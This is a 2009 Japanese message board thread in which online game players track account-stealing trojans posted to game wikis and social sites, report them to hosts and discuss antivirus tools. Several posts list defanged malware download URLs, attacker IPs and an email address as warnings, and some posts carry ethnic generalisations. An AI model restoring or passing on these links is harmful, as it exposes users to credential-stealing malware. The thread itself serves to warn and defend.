あと、今テストスレで試した所ww〜infoseikの所でNGワードに設定されたみたいだ <> (○口○*)さん<>sage<>09/11/08 17:15 ID:0AxsKcts0<> >それっぽい日本語のコメントを適当にコピペした
何を今更
垢ハックが始まった頃から定番の手口じゃん

>大体の意味くらいなら機械翻訳とかで判るだろうし
大体の意味すら調べてないと思う <> (○口○*)さん<>sage<>09/11/08 17:26 ID:kRNC7zPy0<> ていうかNGワードばらすのは敵得だぞ <> (○口○*)さん<>sage<>09/11/08 17:28 ID:0kBk6/2n0<> 得はしてないだろw別に損もしてないけど <> (○口○*)さん<>sage<>09/11/09 00:32 ID:IvIE0UNo0<> >>43
再翻訳しても意味が復元される程度の文章作ってueuoに送っておいたよ。
要約→「悪質なアカウント発見/URLは>>42/ネトゲ垢ハックのトロイが置いてある/消しても同じ手口を繰り返す/相手は中華/以後警戒して」
多分通じるだろう。。 <> (○口○*)さん<>sage<>09/11/09 00:45 ID:tl4k0ki70<> 日本語もまともに分からないような人間を集めてコキ使って作業させているだけ
賢さを上げるより、はいて捨てるほどいる人材を使って下手な鉄砲を撃ちまくるんだよ

それでも引っかかる人がいるんだから、SPAMメールに近いものがある <> (○口○*)さん<>sage<>09/11/09 01:48 ID:FByvnW0y0<> 日本人は律義に、相手の言語に合わせて対話を行うからね。日本語の特殊性もあるけど。
他はまあ、英語こそが正義という勢いだったり、平気でピンイン会話続けてたりと。
郷に入ればなんとやらとは良く言ったものだ。

>>60
あちらは都市と農村戸口の格差が酷いからね。
スウェットショップのようなタコ部屋労働でも、儲けの少ない国内向け農業の穴埋めには十分過ぎる手取りが得られる様子だし。 <> (○口○*)さん<>sage<>09/11/09 02:16 ID:IvIE0UNo0<> >>42はもう削除されたみたい。対応は早いようで何よりだ。 <> (○口○*)さん<><>09/11/09 11:13 ID:Con566oy0<> a <> (○口○*)さん<>sage<>09/11/09 20:56 ID:ogZz99Zi0<> RMT業者のカキコからIPとってきたら211008210188.cidr.odn.ne.jpだった
ま、当然ちゃ当然だが、出来ることは何でもやるのが中華一族だ <> (○口○*)さん<>sage<>09/11/09 21:03 ID:h6FINptF0<> BSWikiの中の人です。
とりあえず今回の件についてまとめてみました。
http://smith.rowiki.jp/?Management%2FIncidentReport%2F2009-11-07
質問や突っ込み等ある方は運営ページのコメント欄かコメントフォームまで宜しくお願いします。

>>41
CIDR制限は一時期考えた事があるのですが、変動の可能性があることを考えると
メンテナンスコストが高いと考えて諦めた経緯が有ります。携帯会社のものなら
きちんとCIDR範囲をアナウンスしてくれますが、こういう場合はそういうことを行いませんし。
併用すれば良いのですが、誤爆等を考えると結局はメンテナンスコストの問題に。

メンテナンスコストはWiki管理のモチベーションへのマイナス要因とも同義であり、
業務でやっている訳ではない事をも踏まえると個人的には結構重視している点だったりします。 <> (○口○*)さん<>sage<>09/11/10 01:23 ID:4X2zkvr90<> >>65
今回の件の遠因として、ODN自体の体質が絡んでいるのは疑うべくもないですね。
ISPのユーザーに対して、.adと .neの双方が払い出される可能性があるのが一貫していないポリシーだと思われます。

本来なら、.ad属性SLDは"adminitrative"の名の通り、「JPRSのJPドメイン名指定事業者である者」に限って
運用されるべきで、それ以外の一般ユーザーに対しては「日本国内のネットワークサービス提供者が、不特定また
多数の利用者に対して営利または非営利で提供するネットワークサービス」として定義された.ne属性SLD、
あるいは慣習的に残っている .or属性SLDの割り当てに限られるべきなのでしょう。 <> (○口○*)さん<>sage<>09/11/10 11:44 ID:ExcDOJK20<> 某所に貼られた危険URL

>露店組合で検索、かなり詳細に載ってます
>p://gamepaslog■com/rosolo/index-php/ <> (○口○*)さん<>sage<>09/11/10 16:15 ID:1fMwRIuE0<> こんなものがyahooニュースにあったので、貼っておきます。

日立ソフト、オンラインゲーム業界向けにクラウドサービスを提供開始
http://headlines.yahoo.co.jp/hl?a=20091110-00000011-rbb-sci <> (○口○*)さん<>sage<>09/11/10 18:18 ID:p3/8yVzm0<> リンク先を読まないで想像で語ると、クラウドの利点は柔軟にサーバリソースを
割り当てたり解放したり、物理的に準備しなくて済むところ。
弱点はっていうと、吹っ飛んだときの影響範囲がまるで謎なところ。

Googleが、サーバ全体の何%かが落ちていても大丈夫なように、不具合発生を
前提に作り込んでやらなければならないね。 <> (○口○*)さん<>sage<>09/11/11 15:52 ID:HFZo8abf0<> MSの月例が出たヨン。緊急3件。
http://internet.watch.impress.co.jp/docs/news/20091111_328020.html <>
◆sp4Sh9QXGI<>sage<>09/11/12 00:53 ID:sOy45mZY0<> mixiのコミュニティ他、弓手Wikiおよび未実装Wikiに爆撃あり。

RWC2009イラストコンテストの展示作品を公開しました
ttp://terlin■wiki2■jp/lhgamevideo■zip

「Trojan-GameThief.Win32.OnLineGames.vrdy」が検出。
上記ドメインは国内無料レンタルサーバー業者のもので、
管理会社へは既に通報済です。 <> (○口○*)さん<>sage<>09/11/12 02:41 ID:AjJZnj+X0<> なんめり倶楽部(製造原価計算)
ttp://terlin■wiki2■jp/3324■php

ローグスレおよび拳聖スレに張られてたURL
zipの次はphpとな <> (○口○*)さん<>sage<>09/11/12 02:44 ID:Vr0bXWUg0<> >>72
そして既ににゅぼーん済み
削除依頼出て無いのに対応早いなぁ <> (○口○*)さん<>sage<>09/11/12 03:07 ID:AjJZnj+X0<> terlinなんちゃらのurlは各wikiにも爆撃中 <> (○口○*)さん<>sage<>09/11/12 04:01 ID:LvdbgQaX0<> Win7入れたので、PeerBlock http://www.peerblock.com/ 入れてみようかなと。
他にも使う人いるかもしれないので、日本語化パッチを配布元から転記。当然ながら利用は自己責任で。

http://hideyoshi.2ch.net/test/read.cgi/download/1250074672/406
>406 :[名無し]さん(bin+cue).rar:2009/09/29(火) 11:22:22 ID:dVDbulnw0
>必要な方以外は無視して下さい。
>
>PeerBlock 1.0_r181 用バッチのみ(本体はHPよりPeerBlock 1.0 Installerを ZIP版で
>もOK)
>DLパス block
>
>XP/VISTA/WIN7 32&64bit ALL
>【zipファイルを見つけました】
>ttp://www1.axfc.net/uploader/File/so/31670.zip
>
>自分の環境はXP 32bitのみです。
>上記環境にてZIP版にて日本語化し、MD5チェックでパッチファイル適用出来る事だけは
>確認しています。
>XP32bitでは表示、動作確認できていますがそれ以外は表示、動作未確認なので、
>使用される方はその事を了承の上でお願いします。

http://hideyoshi.2ch.net/test/read.cgi/download/1250074672/688
>688 :[名無し]さん(bin+cue).rar:2009/10/30(金) 15:42:22 ID:gApChdDH0
>必要な方以外は無視して下さい。
>
>PeerBlock 1.0_r202 用バッチのみ(本体はHPよりPeerBlock 1.0+ (r202) Installerを
>ZIP版でもOK)
>DLパス block
>
>XP/VISTA/WIN7 32&64bit ALL
>ttp://www1.axfc.net/uploader/File/so/33400.zip
>
>自分の環境はXP 32bitのみです。
>上記環境にてZIP版にて日本語化し、MD5チェックでパッチファイル適用出来る事だけは
>確認しています。
>XP32bitでは表示、動作確認できていますがそれ以外は表示、動作未確認なので、
>使用される方はその事を了承の上でお願いします。 <> (○口○*)さん<>sage<>09/11/12 04:19 ID:lf8LGHdA0<> terlin某ですが

REMOTE_ADDR: 118.102.11.67
REMOTE_HOST: idc-67-11-102-118.hkt.cc

でした。VPN…らしいですね。 <> (○口○*)さん<>sage<>09/11/12 04:59 ID:GE3eQgYt0<> 今未実装Wikiにあったもの
修復中なのでお気をつけを。

RWC2009イラストコンテストの展示作品を公開しました
ttp://terlin■wiki2■jp/3324■php <> (○口○*)さん<>sage<>09/11/12 09:10 ID:ssXgBM550<> Panda Cloud Antivirusって、ちょい気になる製品だな。
http://internet.watch.impress.co.jp/docs/news/20091111_328057.html

当然、他のセキュリティソフトと排他的利用になるが。 <> (○口○*)さん<>sage<>09/11/12 09:20 ID:nV+UJJqH0<> terlinは日本語サービスなので普通に日本語で通報可能。
通報しておいた。

ここのところ福建中華一味はterlinを含めた無料系サービス悪用に方向性を変えて来た?

FC2ブログに赤石向け罠ブログを作ったがIFRAMEが無い、FC2がこっそり対策を講じたか仕込み忘れ?
ハニーポット状態(だった)赤石掲示板に50件以上爆撃して仕込み忘れってよっぽどの間抜けだが。
rstone77■blog11■fc2■com
(記事なし。本来なら見ただけで感染狙いと言う典型的な罠ブログだったであろう)
ブログタイトルを検索すると同名FC2ブログが見つかる、そこに目を付けたんだろうね。

ECO関連では相変わらず生きてるドメイン総出で攻撃していたりと
引っかかりそうな名前はあらかた出尽くした上に対策されてるので
新ドメイン取るのも大変そうだ。

金のかからぬ無料系サービスを次々と利用する辺り
今はきっと蛇の親分への上納金を払うのが精一杯なのかもね。 <> (○口○*)さん<>sage<>09/11/12 11:16 ID:Q5GLx75W0<> >>79
4gameranking が仕込み済み。 <> (○口○*)さん<>sage<>09/11/12 11:33 ID:Q5GLx75W0<> >>80
fc2に御注進と思ったら、すでにBANされた模様。
最近は随分と対応早くなったもんだなぁ。 <> (○口○*)さん<>sage<>09/11/12 11:34 ID:ssXgBM550<> 対応早いというか火消し? <> (○口○*)さん<>sage<>09/11/12 11:43 ID:pAxnAazx0<> terlin■wiki2■jp/3324.php
--->donwload11■exe

http://www.virustotal.com/analisis/6de61ac7381516044603c24512e12e25f62abb5ebefba2b3dc63db03bdb0766b-1257992967
>Result: 30/41 (73.18%)
>K7AntiVirus 7.10.892 2009.11.09 Trojan.Win32.Malware.1

有名どころではAvastとSymantecがスルー

しかしjpドメインで貼られると油断して踏む人も居そうだねぇ <> (○口○*)さん<>sage<>09/11/12 11:46 ID:LvdbgQaX0<> >>83
PG2でもブロック対象にしてないだろうしね。 <> (○口○*)さん<>sage<>09/11/12 11:51 ID:SkMwdpUt0<> >>80
俺が79書き込んだ後に仕込んだのかな?書き込む直前にも確認したんだけど
製作された9日からそのときまでは4gameranking入りIFRAMEも無かったんだよね。
今改めてソースチェッカーを見るとやっぱりそんな感じだな。

俺がIFRAMEがなかった9日に通報、仕込まれた後削除だから
FC2ブログ運営も一応マークはしていたんだと思う。 <> (○口○*)さん<>sage<>09/11/12 15:40 ID:/bC8J2oM0<> >>83
バスターのPAK_Genericは「Packerだよ(UpackやFSGなど)」ってだけで
実際には検知しません(かなり前に2chセキュ板で利用者がトレンドマイクロに確認済み)。

トップの terlin■wiki2■jp に何も作成していないから純粋なウイルス置き場ですねぇ。 <> (○口○*)さん<>sage<>09/11/12 18:44 ID:LvdbgQaX0<> terlin■wiki2■jp の件。mixiにも投下されており、ラグナロクオンラインコミュニティの管理人さんが
サーバー管理者に報告していたようで、このような投稿がありました。

>ちなみに、963のURL投稿に使われた「Wiki2.jp」についてはレンタルサーバ運営元(SiteMax)に
>連絡を差し上げたところ、調査のうえ有害ファイルを発見し当該スペースを停止・ファイルを削除した旨の
>返信を12時30分頃いただきました。 <>
◆sp4Sh9QXGI<>sage<>09/11/12 18:58 ID:sOy45mZY0<> RBB TODAY
mixiでウイルスへの誘導リンクが横行 〜 オンラインゲームの投稿動画を偽装

http://www.rbbtoday.com/news/20091112/63699.html

このような記事が上がってます。
右の画像はどう見てもLoki鯖コミュですね。 <> (○口○*)さん<>sage<>09/11/12 19:49 ID:Vr0bXWUg0<> > 85 名前:dssdss[] 投稿日:09/11/12(木) 18:48 ID:GA/biXDa0
> Ragnarok Onlineの攻城戦で使った経費(アイテム)を計算
> http://web2■nazca■co■jp/bumiezhihuo/up43732■zip

すでに削除済みなのでこちらに情報を転記 <> (○口○*)さん<>sage<>09/11/12 20:33 ID:u1byM8JQ0<> >>89のURLでぐぐったところファンタシースターZEROのwikiに残骸発見
このドメインはまだ出てなかったかな

> Ragnarok Onlineの攻城戦で使った経費(アイテム)を計算
> http://sinamanshajiji■freetzi■com/forum/upload/92938/up43732■zip <> (○口○*)さん<>sage<>09/11/12 21:20 ID:LvdbgQaX0<> >>90
確認GJ。そのファイルmixiにも貼られてた模様。情報持ってくるのさぼっててごめん。 <> (○口○*)さん<>sage<>09/11/12 23:05 ID:u1byM8JQ0<> bumiezhihuoでぐぐると中国語ばかりが出てくる
BuMieZhiHuoということらしい
検索に多く出てくるそれっぽい単語は「不○之火」?
○=灰のノがないような漢字

その漢字で画像検索
http://images.google.co.jp/images?q=%E4%B8%8D%E7%81%AD%E4%B9%8B%E7%81%AB&lr=lang_ja&oe=utf-8

ライター?
中国系の言葉わからないんで推測です>< <> (○口○*)さん<>sage<>09/11/12 23:50 ID:u7Pi+4ZN0<> 自分も最近消すだけでURLの報告してなかったので最近に投下された垢ハクの削除跡から漁って来たよ。
釣り文章は省略。周ったWiki…ケミ、プリ、殴りプリ、モンク、ガンスリ、スパノビ、リンカー、拳聖

tp://bumiezhihuo■coolpage■biz/20091110/cgi-bin/050050005DDF/
tp://srwerwerwqq■toypark■in■/images/

【無料ホムペサービスが使われたもの】
tp://web2■nazca■co■jp/bumiezhihuo/up43732■zip

【一般のuploaderが使われたもの】
[うpろだ.tv] まだファイルが存在する 元ファイル名:startplay.lzh 45KB
tp://www1■uploda■tv/v/uptv0050122■lzh (uptv050120,uptv050121,uptv050122の3つがトロイ)

[ななし.org - ファイルアップローダー] まだファイルが存在する 42KB
tp://77c■org/p■php?f=nk11198■zip&c=91e4 (nk11198,nk11199がトロイ)

[うpろだどっとねっと] ファイル削除済
tp://www■uproda■net/down/uproda000896■zip

ろだの2件、削除依頼とかまではしてない。
一般のろだが使われてくるとなると、普段そういったファイルへアクセスしない人は
ろだ系のリンク集からアドレス集めてHOSTSに突っ込んだ方がいいのかも。 <> (○口○*)さん<>sage<>09/11/13 02:29 ID:Y8lIJHBq0<> Gumblar再来襲。interQのホームページスペース「404エラー」改ざん
blogs.yahoo.co.jp/noooo_spam/59139250■html
>URLアドレスが『 http://***.interq.or.jp/ 〜 』のホームページで、かつページが存在しない時にGMOインターネットから提示される404エラーや403エラーのページすべてが対象

今適当なページURLをソースチェッカーに入れてみたけどまだ埋まってる。 <> (○口○*)さん<>sage<>09/11/13 08:59 ID:HtH3V7yv0<> もう何でもありだなw <> (○口○*)さん<>sage<>09/11/13 09:45 ID:CIwoh0qR0<> >>94
それは置き換える必要あるアドレスなのか? <> (○口○*)さん<>sage<>09/11/13 10:10 ID:odthIusL0<> 先日悪用されたwiki2については公式でお知らせが出た。

*FTPアップロードの制限のお知らせ
ttp://infomation.sitemix.jp/?p=102

-----部分引用ここから
サイトミックスをご利用いただき、誠にありがとうございます。

本日サイトミックスサービス内で、アカウントハックを行う不正ソフトウェアの配布サイトが作成されておりましたことをご連絡いたします。
(現在は削除されております。)

.exeファイルが直接ダウンロードが可能になっておりましたので、
セキュリティ対策の一環として.exeファイルのアップロードを禁止させていただきました。

アップロード禁止
・拡張子が.exeのファイル
-----ここまで <> (○口○*)さん<>sage<>09/11/13 16:12 ID:NTBrfZeQ0<> 頑張って調べて、VMware Playerを使ってUbuntuを起動してみた。
・・・んだが、もしかしてCDに焼いてそこから起動しないとセキュリティ上意味がなかったりする? <> (○口○*)さん<>sage<>09/11/13 16:21 ID:HtH3V7yv0<> スレチ <> (○口○*)さん<>sage<>09/11/13 16:39 ID:20+/LQUS0<> ブートローダーに読み込まれたら意味がない
DLL等OSに保護されている部分で悪さしていたら意(ry <> (○口○*)さん<>sage<>09/11/13 18:09 ID:uU2Wrl8g0<> >98
「セキュリティ上」という表現だが、何のためにVMWare+Ubuntuを使うか、で変わる。

例えばネットのブラウズを安全に行う・危険アドレスのチェックをする・検体の入手を
行う為、とかなら十分意味はある。
Linuxに感染するウィルスも当然あるから万能ではないけど、Winゲームのアカハックの
トロイ相手なら安全と言える。

でもアカハックのトロイに感染した可能性があって癌IDのパスワードを変更する為なら
意味がないケースがある。
トロイの手法次第では、情報を抜かれる可能性は0じゃない。

完全に安全な環境を作りたいなら、CD起動じゃないとダメ。 <> (○口○*)さん<>sage<>09/11/17 02:22 ID:P4J3tYs70<> 念のため保守しておくよ。 <> (○口○*)さん<>sage<>09/11/17 16:16 ID:iev6sUAC0<> 「Gumblar」酷似ウイルス被害拡大、国内1250サイト以上改ざん
http://internet.watch.impress.co.jp/docs/news/20091117_329507.html <> (○口○*)さん<>sage<>09/11/17 17:56 ID:/vkFrvfp0<> はじめまして
ノートンインターネットセキュリティ2010を使用してるのですが
先ほどログインしようとしたらファイルインサイトでRagexe.exeがコンピューター上で疑わしい動作をしています、遮断して削除をお勧めします
と出るのですが、これはウィルスか何かでしょうか?

昨日までは何も無かったので・・・
スキャンしても何も検出されませんが、アンインストールしても出ます。 <> (○口○*)さん<>sage<>09/11/17 18:06 ID:iev6sUAC0<> nProtectを検知したのか、他になにか感染しているのか判断できません。 <> (○口○*)さん<>sage<>09/11/18 02:29 ID:EN0qlA3F0<> 今日のパッチでexeが新しくなったから反応しただけでしょう <> (○口○*)さん<><>09/11/18 22:26 ID:+xT43cS50<> 【      気付いた日時          】 11/18 17:00頃
【不審なアドレスのクリックの有無 】 踏んだ以上有orz  exeはないと思います
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 WinXP SP3
【使用ブラウザ 】 FireFox3.5.5
【WindowsUpdateの有無】 有 自動更新の為最新
【 アンチウイルスソフト 】 NOD32アンチウィルス 定義ファイル最新
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 無、カスペオンラインスキャンはメンテ中
【スレログやテンプレを読んだか】 今から読みます
【hostsファイルの変更】 無
【PeerGuardian2の導入】 有 Lineage■paix■jp
【説明】 (被害状況をできるかぎり詳しく書く)

夕方感染に気づきました(ROログイン前)
バッチリXEROXフォルダ内に『[バルザロック]ROのID名(日時).png』のSSとZIPファイルあり・・・
調べてみたところどうやらこのウィルスはレジストリ等からアカウント抜いてWinny経由で情報バラまくみたいなのですが
WinnyやShereなどのファイル交換ソフトがインストールされていない場合は流出の可能性は薄いと見て大丈夫でしょうか?
一応WinnyやShereのハッシュサイトへの登録や2ch関連スレ等で自分のSS、ZIPを発見することはなかったです

もし今日の朝〜夕方までのSSが暴露されてるよという情報お持ちでしたらご一報お願いします
流出してしまった以上どうしようもないですが・・・

流出してたとしてもROにログインする前に気づいたので情報の流出はIDとSSとチャットログぐらいだと思うのですが
当然いまからクリーンインストールします・・・
パスワード入力とかしてなければまだ望みは・・・あるかな? <> (○口○*)さん<>sage<>09/11/18 23:24 ID:oto06iET0<> いやーそれはさすがに2chダウソ板で聞いたほうがいいんじゃね <> (○口○*)さん<>sage<>09/11/19 08:20 ID:qrUrl0Gh0<> そりゃー、パスワードはレジストリ保存されてないからねぇ。入れてない/PCに保存されてない ものについては流出しようがないです。

暴露系はP2Pに流す奴と、どっかの掲示板等に投稿する奴と…まぁ、いろいろあるし、流出したかどうかまでは
踏んだものがなにか、検出名はなにか…といった情報がないと、流出するであろう宛先わからんし。

.を■に置き換えたアドレスも置いといて欲しいとこだけど、細かいことは気にせずクリーンインストールしてら〜 <> (○口○*)さん<>sage<>09/11/19 08:23 ID:G517nIcX0<> 職場でいまだにパソコンや持ち運び可能な記憶装置にパスワードかけてないやつが多くて困る
情報リテラシーなさすぎだろ <> (○口○*)さん<>sage<>09/11/19 08:28 ID:pRQechJc0<> リテラシーというより、組織の場合は全体的なプライバシーポリシーの
確立が必要。各自がバラバラにやってたんじゃどうしようもない。 <> (○口○*)さん<>sage<>09/11/19 11:35 ID:3NqjdPCk0<> >>107
>【 ウイルススキャン結果】 無、カスペオンラインスキャンはメンテ中
>調べてみたところどうやらこのウィルスは

別にオンラインスキャンには限らないから手段と結果書いてくれよw

>>109
>パスワードはレジストリ保存されてない
いちおう念押し
ブラウザに記憶させてるとレジストリ"等"に保存される点には注意 <> (○口○*)さん<>sage<>09/11/19 11:47 ID:ZkHYOIH20<> >>110
>>111も触れているように、場当たり的な対応ならそれでも良いかもしれないけれど、業務として
きちんと運用していくためには、しっかりと内部統制の体系作りが必要になるからね。
リムーバブルデバイスにしても、個人の私物なら本人しか判らないパスワードで済むけど、
社用で使っている物の場合、パスワードの運用ポリシー、引き継ぎの際のルールなども明確にしないと混乱が起きる。
何らかのトラブルが発生した場合のインシデントフローなども、最低でも部署単位、規模によっては
全社での統一基準で運用されなければならない。

とまあ、こういった事を逐一書き連ねていくと、それこそISO取得の為の本が一冊出来上がるくらいの分量になってしまったりする。 <> 111<>sage<>09/11/19 11:48 ID:pRQechJc0<> つまらんことだが訂正
プライバシーポリシー→セキュリティポリシー

>>107
>調べてみたところどうやらこのウィルスはレジストリ等からアカウント抜いてWinny経由で
>情報バラまくみたいなのですが
調べた結果だけじゃなくて詳細を書いてくれないと「ふむふむそうなのか」としか <> (○口○*)さん<>sage<>09/11/19 16:11 ID:4qMJWj370<> クリーンインストール終了・・・
皆様レスありがとうございます

>>109
NOD32最新定義データベースでは何も検出されませんでしたので何を踏んだかわからず・・・
ですが「Trojan-Spy.Ruby.Kakkeys.d」というウイルスとまったく同じ状態でした
どこで踏んだかはわかりません・・・

>>112
上記の通りNOD32でPC全検索しましたが何も検出されませんでした

>>114
ウイルスの詳細です
アドレス
ttp://www■viruslistjp■com/viruses/encyclopedia/?virusid=109007
「バグザロック」でググってすぐ見つかります <> (○口○*)さん<>sage<>09/11/23 01:10 ID:uw8Z29R80<> 保守しなければならないほど平和というのも、いいんだか悪いんだか <> (○口○*)さん<>sage<>09/11/23 03:28 ID:ZO2ksko10<> まあ>>115の件は未解決と言えば未解決なんだが
OS入れ直しちゃったからエンディングだしなぁ <> (○口○*)さん<><>09/11/23 03:35 ID:+MBTKgaL0<> キャラクエ開くとカスペルが反応するんですが同じような方いますか? <> (○口○*)さん<>sage<>09/11/23 03:40 ID:ZO2ksko10<> もしいたら何なの?
ごめん面倒なので見にはいかないが <> (○口○*)さん<>sage<>09/11/23 04:32 ID:iNaYmYAk0<> >>118
カスペルスキー googleads.g.doubleclick.net でググってみるといい。
簡単に言うと、doubleclickという会社をgoogleが買収して新しい?サービスを開始したが
doubleclickという会社は以前ちょっとアレな会社だった、っていう。
害はないと思われるが気になるようならカスペルの方で対策するといいかもね。 <> (○口○*)さん<>sage<>09/11/23 05:21 ID:EX04SzBb0<> 同様にRoratorioのほうもgoogleads.g.doubleclick.netのバナー広告に反応。
分かっていても気持ちの良いものじゃないし、やっぱり嫌だね。 <> (○口○*)さん<>sage<>09/11/23 11:07 ID:NweOSm+f0<> Adblock Plusマジオヌヌメ <> (○口○*)さん<>sage<>09/11/23 20:12 ID:WQO/y3La0<> IE6 and IE7 0-Day Reported
http://isc.sans.org/diary.html?storyid=7624 <> (○口○*)さん<>sage<>09/11/23 20:41 ID:2mNpmIH00<> doubleclick懐かしいな

当時は同様な会社が大量に発生しては消えていったな <> (○口○*)さん<>sage<>09/11/24 13:47 ID:iZXqQEM10<> >>123
ttp://www.microsoft.com/japan/technet/security/advisory/977981.mspx <> (○口○*)さん<>sage<>09/11/26 17:34 ID:nqBEbYSg0<> KIS2010のWin7対応版+verup(9.0.0.736)が本日来たね

>○改善点
>オンラインゲームで使用されているProtect Game Monitorの障害への対応
>オンラインゲームが起動しない、オンラインゲーム利用後にOSの動作が不安定になる、などの現象が回避されます。

これからDLして動作安定するか人柱してみるわ <> (○口○*)さん<>sage<>09/11/26 17:37 ID:h/LQjZmE0<> 盛者必衰とはいうが、カスペも落ちたなぁ
最高とは言わないが、割と安定した地位を維持するのはノートンか? <> (○口○*)さん<>sage<>09/11/26 19:37 ID:aeX5fuVv0<> >>127
安定して新種への対応の遅いことで定評があります。 <> (○口○*)さん<>sage<>09/11/26 21:04 ID:L9/hF1Bw0<> 落ちたとか言ってるのってセキュ板の雑音のコピペを鵜呑みにしてるか
雑音本人だろうな。 <> (○口○*)さん<>sage<>09/11/26 21:57 ID:x72KRTak0<> >>127
先生誤検知大杉であります <> (○口○*)さん<>sage<>09/11/26 22:01 ID:aiLsB3zp0<> キンタマの再来来たな
ttp://tsushima.2ch.net/test/read.cgi/news/1259236812/

まあ割れてる奴が悪いが <> (○口○*)さん<>sage<>09/11/26 22:15 ID:ijnfEWOD0<> セキュアブレイン、クラウド活用ウイルス対策ソフトを無償提供  

ttp://internet.watch.impress.co.jp/docs/news/20091126_331491.html

最近流行のクラウド型アンチウィルスソフト <> (○口○*)さん<>sage<>09/11/26 22:35 ID:ijnfEWOD0<> >>132
追記
zip圧縮されたダミーウィルスで反応をテストしてみた
MSEはダミーウィルスをダウンロードした時点で反応
このソフト展開した時点で反応 <> (○口○*)さん<>sage<>09/11/27 01:11 ID:gh4gZfIf0<> >>131
ROのSSが上がってる。もう鯖も名前もギルドも特定済みみたいだな
オーラパラでブラウザのTABに"BOT"の文字が… <> (○口○*)さん<>sage<>09/11/27 06:14 ID:hZMIV0BM0<> >>126
それとは別物ぽいが…Win7対応のアップデートもきてるようだ

ジャストシステム
・Kaspersky Internet Security 2010 バージョンアッププログラム CF2
http://www.just-kaspersky.jp/support/win7.html <> (○口○*)さん<>sage<>09/11/27 14:35 ID:N3RDYi5E0<> >>134
もしかしたら「ROBOT魂」かもしれないw <> (○口○*)さん<>sage<>09/11/27 16:26 ID:jPMftY7T0<> CF2 が orz に見えた俺はもう駄目かもしれない <> (○口○*)さん<>sage<>09/11/27 16:27 ID:YXhftvdz0<> >>132
他のソフトと併用できるみたいだね。
MSEとVB2010は確認した。
ttp://www.securebrain.co.jp/products/gredavx/index.html

同じ会社のPhishWallクライアントも興味深い。
ttp://www.securebrain.co.jp/products/phishwall/client.html
WOTが思ったほど役に立っていないが、こちらはどうだろうか。 <> 126<>sage<>09/11/27 17:42 ID:u2R9aYDo0<> >>135
そのことも含めてたつもりだったんだけど、結果的にそんな感じ

人柱報告
KIS2010 ver9.0.0.736 OS:XP SP3
自分の場合、gamemon.desがCPU使用100%になってフリーズする不具合でたけど
設定で許可にしたらKIS2009の頃のように不具合はなくなった感じです。 <> (○口○*)さん<>sage<>09/11/28 17:41 ID:mCo97rAJ0<> >>134
それは多分
 BOT・ノーマナー・イクナイプレイヤー晒しスレ
ってスレだ。 <> (○口○*)さん<>sage<>09/11/28 20:19 ID:wGK4izGC0<> >139
カスペ2010は安定ビルドになったと言えるのかな? <> (○口○*)さん<>sage<>09/11/29 01:23 ID:mkIDyjoX0<> 中華どものハック対象は再びアラドに向いた?
qaddongと言うハッカーが暴れているようだ。
福建中華の息がかかっている工作員か別グループかは現在のところ不明。

情報:アラドしたらばID盗難スレ
ttp://jbbs.livedoor.jp/bbs/read.cgi/game/31585/1258269753/48
-----ここから
48 :取引関連スレの連投制限が6時間になりました。詳しくは運営スレへ:2009/11/28(土) 22:36:51 ID:ueCiDJJo0
同じくたった今抜かれたのでご報告。

被害確認日時:2009年11月28日
(中略)
まだIE閉じてないのでユーザ情報とか見れますがPW、メル変えられました。
qaddong@hotmail■com
-----ここまで

アカウント管理には気をつけてくれよな! <> (○口○*)さん<>sage<>09/11/29 08:44 ID:nFQJwsx20<> セキュニアみたいなのがまた出たようだ。
オンラインでチェックできるようなのでとっつきやすいかも。

ソフトが最新版かを確認できる「エフセキュア ヘルスチェック」
http://internet.watch.impress.co.jp/docs/news/20091127_331908.html <> (○口○*)さん<>sage<>09/11/30 09:55 ID:QV8VgnY70<> ハッシュ値を元にDoS攻撃を「逆探知」、NECらが開発
ttp://www.atmarkit.co.jp/news/200911/27/traceback.html

技術は興味深いんだけれど、逆探知した結果、
「この先は俺らの管轄外だからわからんねぇ」で終わってしまったら
どうにもならんよなぁ。 <> (○口○*)さん<>sage<>09/11/30 18:17 ID:3CSGSGg00<> その場合は無条件にそのISPを遮断だな <> (○口○*)さん<>sage<>09/11/30 18:55 ID:HJKIhQUx0<> 遮断も何もIP偽装だったら発信元わからんでしょ <> (○口○*)さん<>sage<>09/11/30 19:34 ID:RaUYUAzU0<> 発信元ごと発信方面の回線を切るってことでしょ <> (○口○*)さん<>sage<>09/11/30 19:38 ID:HJKIhQUx0<> それを日本でやったらどうなるか分かるか?
想像力足り無くない? <> (○口○*)さん<>sage<>09/11/30 21:17 ID:mUz2+PrI0<> ほとんどのspam発信元がどこかを考えるとだな…やっても実害出ないな。
遮断は無条件に行われる訳じゃないだろうし。 <> (○口○*)さん<>sage<>09/12/01 01:01 ID:3nMaMHOb0<> IP偽装してても検知に成功してるな。
IPではなくパケットとハッシュ値を使って割り出してる。
でも、確かにかの国のプロバイダーに停止の依頼出しても効果ないのは明白だな。
国内の小学生アタッカーくらいなら懲らしめられるかもしれないが。
ただ、これも防衛手段の一歩前進と考えれば期待してもいい。
いつか、攻性防壁ができるかもしれないし。 <> (○口○*)さん<>sage<>09/12/01 07:54 ID:U2IfFTHX0<> さて、AntiVirの日本語版が出た訳だが… <> (○口○*)さん<>sage<>09/12/01 08:47 ID:W3+TRscD0<> >>151
せっかくなので、英語版から日本語版に入れ替えてみた
当たり前の話だけどUIが日本語になった以外は何も変わりない <> (○口○*)さん<>sage<>09/12/01 14:18 ID:/jJ31ILv0<> 公式に国外接続制限事項に関しての記載がありましたので、書き込みます。

国外接続制限範囲拡大のお知らせ [2009/11/30]
http://www.ragnarokonline.jp/news/information/notice/item/13309 <> (○口○*)さん<>sage<>09/12/02 00:32 ID:n7n6DTyl0<> KIS2010が今月で切れるからAviraにしようかな
継続あんまりする気にならん・・・ <> (○口○*)さん<>sage<>09/12/02 01:17 ID:2qS8Ko6x0<> メインPCはKIS2010だけど
サブPCはMSEだな
別のセキュソフトの方がいいかなって <> (○口○*)さん<>sage<>09/12/02 03:30 ID:eAIHwULN0<> 今、二つプロダクトIDついてくるような <> (○口○*)さん<>sage<>09/12/02 08:50 ID:8bUeCnYu0<> IPA、インストールしているソフトが最新版かチェックするツール
http://internet.watch.impress.co.jp/docs/news/20091130_332419.html

32bitOSだけ(Win7未対応)、IE7まで・・・・・・・・使えるのか、これ?

XP(x86) SP3+IE8で実行。F-Secureの奴(>>143)より異様に早く結果が出る。このチェックの速さだけは評価に値する。
